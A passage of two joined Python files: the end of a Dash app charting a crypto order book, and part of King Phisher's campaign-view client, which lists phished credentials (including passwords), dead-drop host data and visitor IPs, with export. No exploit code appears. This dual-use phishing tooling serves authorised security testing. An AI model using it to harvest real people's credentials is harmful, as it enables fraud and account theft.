ladder_Ask_Max = fixNan(shape_ask[combined]['volume'].max(), False)
data_min = fixNan(data[TBL_VOLUME].min())
data_max = fixNan(data[TBL_VOLUME].max(), False)
ob_bid_max = fixNan(ob_bid[TBL_VOLUME].max(), False)
ob_ask_max = fixNan(ob_ask[TBL_VOLUME].max(), False)
symbol = SYMBOLS.get(base_currency.upper(), "")
x_min = min([ladder_Bid_Min, ladder_Ask_Min, data_min])
x_max = max([ladder_Bid_Max, ladder_Ask_Max, data_max, ob_ask_max, ob_bid_max])
max_unique = max([fixNan(shape_bid[combined]['unique'].max(), False),
fixNan(shape_ask[combined]['unique'].max(), False)])
width_factor = 15
if max_unique > 0: width_factor = 15 / max_unique
market_price = marketPrice[combined]
bid_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(0,255,0)'))
ask_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(255,0,0)'))
shape_arr = [dict(
# Line Horizontal
type='line',
x0=x_min * 0.5, y0=market_price,
x1=x_max * 1.5, y1=market_price,
line=dict(color='rgb(0, 0, 0)', width=2, dash='dash')
)]
annot_arr = [dict(
x=log10((x_max*0.9)), y=market_price, xref='x', yref='y',
text=str(market_price) + symbol,
showarrow=True, arrowhead=7, ax=20, ay=0,
bgcolor='rgb(0,0,255)', font={'color': '#ffffff'}
)]
# delete these 10 lines below if we want to move to a JS-based coloring system in the future
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 1.05,
line=dict(color='rgb(255, 0, 0)', width=0.01),
fillcolor='rgba(255, 0, 0, 0.04)'))
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 0.95,
line=dict(color='rgb(0, 255, 0)', width=0.01),
fillcolor='rgba(0, 255, 0, 0.04)'))
for index, row in shape_bid[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(0, 255, 0)', width=cWidth)))
bid_trace['x'].append(vol)
bid_trace['y'].append(row['min_Price'])
bid_trace['text'].append(row['text'])
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(posY)
bid_trace['x'].append(vol)
bid_trace['y'].append(row['max_Price'])
bid_trace['text'].append(row['text'])
for index, row in shape_ask[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(255, 0, 0)', width=cWidth)))
ask_trace['x'].append(vol)
ask_trace['y'].append(row['min_Price'])
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(posY)
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(row['max_Price'])
ask_trace['text'].append(row['text'])
result = {
'data': [
go.Scatter(
x=data[TBL_VOLUME],
y=data[TBL_PRICE],
mode='markers',
text=data['text'],
opacity=0.95,
hoverinfo='text',
marker={
'size': data['sqrt'],
'line': {'width': 0.5, 'color': 'white'},
'color': data['color']
},
), ask_trace, bid_trace, go.Scatter(
x=ob_ask[TBL_VOLUME],
y=ob_ask[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_ask['text'],
line = dict(color = ('rgb(255, 0, 0)'),
width = 2)
),go.Scatter(
x=ob_bid[TBL_VOLUME],
y=ob_bid[TBL_PRICE],
mode='lines',
opacity=0.5,
hoverinfo='text',
text=ob_bid['text'],
line = dict(color = ('rgb(0, 255, 0)'),
width = 2)
)
],
'layout': go.Layout(
# title automatically updates with refreshed market price
title=("The present market price of {} on {} is: {}{} at {}".format(ticker, exchange, symbol,
str(
marketPrice[combined]),
timeStamps[combined])),
xaxis=dict(title='Order Size', type='log', autotick=True,range=[log10(x_min*0.95), log10(x_max*1.03)]),
yaxis={'title': '{} Price'.format(ticker),'range':[market_price*0.94, market_price*1.06]},
hovermode='closest',
# now code to ensure the sizing is right
margin=go.Margin(
l=75, r=75,
b=50, t=50,
pad=4),
paper_bgcolor='#F5F5F5',
plot_bgcolor='#F5F5F5',
# adding the horizontal reference line at market price
shapes=shape_arr,
annotations=annot_arr,
showlegend=False
)
}
return result
def prepare_send():
lCache = []
cData = get_All_data()
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
lCache.append(html.Br())
if (pair.Dataprepared):
lCache.append(dcc.Graph(
id=graph,
figure=cData[exchange + ticker]
))
else:
lCache.append(html.Div(id=graph))
return lCache
# links up the chart creation to the interval for an auto-refresh
# creates one callback per currency pairing; easy to replicate / add new pairs
@app.callback(Output('graphs_Container', 'children'),
events=[Event('main-interval-component', 'interval')])
def update_Site_data():
return getSendCache()
# explanatory comment here to come
def round_sig(x, sig=3, overwrite=0, minimum=0):
if (x == 0):
return 0.0
elif overwrite > 0:
return round(x, overwrite)
else:
digits = -int(floor(log10(abs(x)))) + (sig - 1)
if digits <= minimum:
return round(x, minimum)
else:
return round(x, digits)
# explanatory comment here to come
def calcColor(x):
response = round(400 / x)
if response > 255:
response = 255
elif response < 30:
response = 30
return response
def fixNan(x, pMin=True):
if isnan(x):
if pMin:
return 99999
else:
return 0
else:
return x
def getStamp():
return int(round(time.time() * 1000))
# watchdog to catch any instances where refresh stops
def watchdog():
global PAIRS
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
time.sleep(3) # get Server start
log(2,"Server should be running now")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
for pair in PAIRS:
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
time.sleep(3)
log(2,"Web sockets up")
for pair in PAIRS:
pair.threadRecalc = threading.Thread(target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
time.sleep(2.5)
log(2,"ReCalc up")
for pair in PAIRS:
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
log(2,"Everything should be running now, starting Watchdog, to control the herd")
while True:
time.sleep(2)
alive = True
for pair in PAIRS:
if not pair.threadRecalc.isAlive():
alive = False
log(2,"Restarting pair Recalc " +
pair.exchange + " " + pair.ticker)
pair.threadRecalc = threading.Thread(
target=recalcThread, args=(pair,))
pair.threadRecalc.daemon = False
pair.threadRecalc.start()
if not pair.threadWebsocket.isAlive():
alive = False
log(2,"Restarting pair Web socket " +
pair.exchange + " " + pair.ticker)
pair.webSocketKill = 1
pair.threadWebsocket = threading.Thread(
target=websockThread, args=(pair,))
pair.threadWebsocket.daemon = False
pair.threadWebsocket.start()
if not pair.threadPrepare.isAlive():
alive = False
log(2,"Restarting pair Prepare worker " +
pair.exchange + " " + pair.ticker)
pair.threadPrepare = threading.Thread(
target=preparePairThread, args=(pair,))
pair.threadPrepare.daemon = False
pair.threadPrepare.start()
if not tServer.isAlive():
alive = False
log(3,"Watchdog detected dead Server, restarting")
tServer = threading.Thread(target=serverThread)
tServer.daemon = False
tServer.start()
if not tPreparer.isAlive():
alive = False
log(3,"Watchdog detected dead Preparer, restarting")
tPreparer = threading.Thread(target=sendPrepareThread)
tPreparer.daemon = False
tPreparer.start()
if not alive:
log(3,"Watchdog got some bad sheeps back to group")
def serverThread():
app.run_server(host='0.0.0.0', port=serverPort)
def sendPrepareThread():
global sendCache, first_prepare, overallNewData
while True:
sendCache = prepare_send()
overallNewData = False
time.sleep(0.5)
while not overallNewData:
time.sleep(0.5)
def recalcThread(pair):
count = 0
refreshes = 0
while True:
if (pair.websocket):
dif = getStamp() - pair.lastStamp
if dif > desiredPairRefresh:
log(1,"Ms Diff for " + pair.ticker + " is " + str(
dif) + " Total refreshes for pair " + str(refreshes))
refreshes += 1
if not calc_data(pair):
count = count + 1
else:
count = 0
pair.lastStamp = pair.usedStamp
if count > 5:
log(3,"Going to kill Web socket from " + pair.ticker)
count = -5
pair.webSocketKill = 0
else:
time.sleep((desiredPairRefresh - dif) / 1000)
def websockThread(pair):
pair.websocket = False
pair.ob_Inst = GDaxBook(pair.ticker)
time.sleep(5)
pair.websocket = True
while True:
kill = 5 / pair.webSocketKill
time.sleep(4)
def preparePairThread(pair):
global prepared, overallNewData
ticker = pair.ticker
exc = pair.exchange
cbn = exc + ticker
while True:
if (pair.prepare):
prepared[cbn] = prepare_data(ticker, exc)
overallNewData = True
pair.Dataprepared = True
while not pair.newData:
time.sleep(0.2)
def handleArgs(argv):
global serverPort, debugLevel, desiredPairRefresh
try:
opts, args = getopt.getopt(
argv, "hp:d:", ["port=","debug=","pRefresh="])
except getopt.GetoptError:
print('app.py -h')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('app.py --port 8050 --pRefresh')
print('--pRefresh indicates the refresh Rate in ms')
sys.exit()
elif opt in ("-p", "--port"):
serverPort = int(arg)
elif opt in ("-d", "--debug"):
debugLevel = int(arg)
elif opt in ("--pRefresh"):
desiredPairRefresh = int(arg)
log(4,"Legend: This is an error message")
log(3,"Legend: This is a warning message")
log(2,"Legend: This is an info message")
log(1,"Legend: This is a debug message")
log(0,"Legend: This is a deep debug message")
log(1,'Web Interface Port is ' + str(serverPort))
log(1,'Debug Level is ' + str(debugLevel))
def log(pLevel, pMessage):
if pLevel >= debugLevel:
text = (str(datetime.now()) + " [" +
debugLevels[pLevel] +
"]: " + str(pMessage))
open("log.txt","a").write(text + "\n")
print(debugColors[pLevel] + text + '\033[0m')
if __name__ == '__main__':
# Initial Load of Data
handleArgs(sys.argv[1:])
watchdog()
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stops early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, kpc, cid):
self.load_campaign_information()
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
if case('deleted'):
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is not None:
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
self.loader_thread_lock.acquire()
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
row_data = self.format_node_data(edge['node'])
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(edge['node']['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, connection):
deploy_details = self.rpc.remote_table_row('deaddrop_deployments', connection.deployment_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details.destination,
connection.visit_count,
connection.visitor_ip,
connection.local_username,
connection.local_hostname,
connection.local_ip_addresses,
connection.first_visit,
connection.last_visit
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
if not 'campaign_id' in self.config:
return
if not self.rpc.remote_table_row('campaigns', self.config['campaign_id']):
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
visitorIp
visitCount
visitorDetails
visitorGeoloc { city }
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['visitorIp']
if visitor_ip is None:
visitor_ip = ''
else:
visitor_ip = ipaddress.ip_address(visitor_ip)
if visitor_ip.is_loopback:
geo_location = 'N/A (Loopback)'
elif visitor_ip.is_private:
geo_location = 'N/A (Private)'
elif isinstance(visitor_ip, ipaddress.IPv6Address):
geo_location = 'N/A (IPv6 Address)'
elif node['visitorGeoloc']:
geo_location = node['visitorGeoloc']['city']
row = (
node['message']['targetEmail'],
str(visitor_ip),
node['visitCount'],
node['visitorDetails'],
geo_location,
node['firstVisit'],
node['lastVisit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
table_name = 'messages'
label_text = 'Messages'
node_query = """\
query getMessage($id: String!) {
db {
node: message(id: $id) {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
}
"""
table_query = """\
query getMessages($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
messages(first: $count, after: $cursor) {
total
edges {
node {
id
targetEmail
sent
trained
companyDepartment { name }
opened
openerIp
openerUserAgent
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Sent',
'Trained',
'Department',
'Opened',
'Opener IP Address',
'Opener User Agent'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 30, 15, 20, 20, 25, 90),
title=label_text
)
def format_node_data(self, node):
department = node['companyDepartment']
if department:
department = department['name']
row = (
node['targetEmail'],
node['sent'],
('Yes' if node['trained'] else ''),
department,
node['opened'],
node['openerIp'],
node['openerUserAgent']
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, parent, application):
"""
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
:param application: The main client application instance.
:type application: :py:class:`Gtk.Application`
"""
self.parent = parent
self.application = application
self.config = application.config
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
